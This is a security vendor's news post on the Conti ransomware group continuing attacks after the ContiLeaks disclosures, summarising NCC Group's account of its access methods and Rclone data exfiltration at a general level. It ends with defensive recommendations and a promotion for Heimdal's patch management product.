The Conti Group Still in Business Regardless of the Data Leak It Faced
The Gang Continues to Exfiltrate Data from Their Victims.
Conti Still in the Cyber Game
To briefly go over Conti’s activities, the group is known as one of the most prolific ransomware groups of the past year, managing to encrypt networks of hospitals, corporations, government agencies, and other organizations in exchange for a large ransom payment.
According to ZDNet, many cybersecurity experts are of the opinion that Conti, like many other popular cybercriminal ransomware organizations, is based in Russia. Besides, members of Conti announced to come out in support of Russia’s invasion of Ukraine in February.
However, soon afterward, the Conti leaks surfaced, naming members of the gang and publishing daily conversation logs, hiring processes, and other details about the group’s inner workings. Nevertheless, the public revelation of Conti’s behind-the-scenes actions appears to have had no effect on the gang.
In this sense, cybersecurity analysts at NCC Group have highlighted how cyber-attacks have continued after the releases about Conti’s activities in a recent report.
In February 2022, a Twitter account which uses the handle ‘ContiLeaks’, started to publicly release information for the operations of the cybercrime group behind the Conti ransomware.(…) Despite the public disclosure of their arsenal, it appears that Conti operators continue their business as usual by proceeding to compromise networks, exfiltrating data and finally deploying their ransomware.
Methods Used by Conti Post Leak
The experts under discussion have discovered that Conti, to obtain a foothold on networks, has used in recent attacks a variety of initial access vectors, including phishing emails encompassing the Qakbot trojan software and infecting unprotected Microsoft Exchange Servers. The exploitation of publicly accessible exploits, such as vulnerabilities in VPN services and the Log4J java libraries represent other methods employed by the threat actors. What’s more, is that the attackers also leverage legitimate hacked accounts to send phishing emails.
Conti ransomware operations are known for encrypting networks and demanding money for the decryption key, as well as taking sensitive data from victims and threatening to broadcast it if the ransom isn’t paid.
Conti hasn’t changed their approach despite being the target of information breaches, and they’re still stealing large amounts of data from victims to use as leverage in double extortion assaults.
Similar to many other threat actors, Conti operator(s) exfiltrate a large amount of data from the compromised network using the legitimate software ‘Rclone’. ‘Rclone’ was configured to upload to either Mega cloud storage provider or to a threat actor controlled server. Soon after the data exfiltration, the threat actor(s) started the data encryption. In addition, we estimate that the average time between the lateral movement and encryption is five days.
What Security Measures Should Be Implemented for Now?
Conti together with other ransomware groups continue to pose a threat to businesses and everyday services, but a severe cyberattack can be prevented if the proper security measures are put in place.
Many Conti efforts, according to the experts, would use unpatched flaws to get initial access to networks, thus businesses should make sure that security fixes for known vulnerabilities are updated as soon as possible to help prevent incursions.
Furthermore, strict password regulations should be implemented as well as multi-factor authentication protection for all users.
Information security personnel should also keep an eye on networks to detect suspicious activity in a timely manner because even if attackers are already inside the network, a ransomware assault can be avoided if they’re discovered before the ransomware is launched.
How Can Heimdal™ Help?
Since one of the essential security measures to implement is to make sure your software is always up to date, we recommend you use Heimdal Patch & Asset Management, an efficient solution that will keep your system patched automatically, featuring a unique advantage: we have the shortest vendor-to-end-user waiting time, thus meaning that the most recent patches will be available in your Heimdal cloud ready to be deployed (repackaged, tested and adware-cleaned) in less than 4 hours! Because prevention is always the easiest path to fighting malware!